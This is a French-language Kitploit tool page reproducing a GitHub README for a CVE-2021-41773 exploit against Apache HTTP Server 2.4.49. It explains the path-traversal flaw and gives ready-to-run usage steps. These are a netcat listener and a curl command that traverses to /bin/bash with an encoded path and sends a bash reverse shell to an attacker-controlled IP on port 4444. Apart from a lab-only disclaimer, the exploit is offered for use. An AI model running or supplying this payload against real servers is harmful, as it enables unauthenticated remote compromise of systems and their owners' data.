Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-41773-Apache_2.4.49-Path-traversal-to-RCE | Kitploit
Outils/GitHubGitHub/cyberquestor-infosec/cve-2021-41773-apache_2.4.49-path-traversal-to-rce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubcyberquestor-infosec/cve-2021-41773-apache_2.4.49-path-traversal-to-rce

CVE-2021-41773-Apache_2.4.49-Path-traversal-to-RCE

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
2il y a 1 anPas encore vérifié

CVE-2021-41773 – Exécution de code à distance dans Apache HTTP Server 2.4.49

⚠️ Avertissement
Ce dépôt est destiné strictement à des fins éducatives et de recherche.
Les informations et le code fournis ici peuvent être utilisés dans des environnements contrôlés, comme des machines de laboratoire privées.
Toute utilisation non autorisée de ce code contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas explicitement l'autorisation de tester est illégale et contraire à l'éthique.
L'auteur n'est pas responsable de tout usage abusif ou des dommages causés.


🔍 À propos de la vulnérabilité

CVE-2021-41773 affecte Apache HTTP Server version 2.4.49.
En raison d'une validation incorrecte des entrées lors de la normalisation des chemins, un attaquant peut exploiter un dépassement de chemin (path traversal) en utilisant des caractères encodés comme %2e pour accéder à des fichiers arbitraires.
Si CGI est activé, cette vulnérabilité peut être élevée en exécution de code à distance non authentifiée (RCE).

  • Type de vulnérabilité : Dépassement de chemin menant à une exécution de code à distance
  • Version affectée : Apache 2.4.49
  • Authentification requise : ❌ Non
  • Gravité : Critique
  • Score CVSS : 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

🧾 Références

  • Avis de sécurité Apache
  • Exploit-DB – 50383
  • PoC GitHub
  • Rapport CVE de la NVD

🛠 Aperçu de l'exploit

Une requête curl malveillante est conçue pour exploiter la faille de dépassement de chemin. Lorsque CGI est activé, les attaquants peuvent atteindre /bin/bash et exécuter des commandes shell arbitraires.
Dans cet exemple, une charge utile de shell inversé (reverse shell) est envoyée pour obtenir un accès shell au serveur.


💥 Démonstration

Cet exploit a été testé dans un environnement de laboratoire privé. Voici les étapes et les résultats.

1. Détection de la version d'Apache

Un scan Nmap a identifié la cible exécutant Apache/2.4.49.

Version d'Apache


2. Exécution de l'exploit

Une charge utile de shell inversé a été envoyée à l'aide d'une commande curl personnalisée.

Exécution de l'exploit


3. Shell inversé reçu

Un shell inversé a été obtenu avec succès sur l'écouteur de l'attaquant.

Shell inversé


📂 Utilisation de l'exploit

Étape 1 : Démarrer l'écouteur Netcat

root@kitploit:~
nc -nvlp 4444

Étape 1 : Exécuter l'exploit

root@kitploit:~
curl -v 'http://<target>:<port>/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/<your-ip>/4444 0>&1' -H 'Content-Type: text/plain'

✔️ Assurez-vous :

La version d'Apache est 2.4.49

CGI est activé

Le port 4444 (ou le port de votre choix) est ouvert via le pare-feu

📖 Blog Medium

Découvrez l'analyse détaillée et la théorie dans mon article Medium :
👉 Lire l'article sur Medium

Télécharger l’outil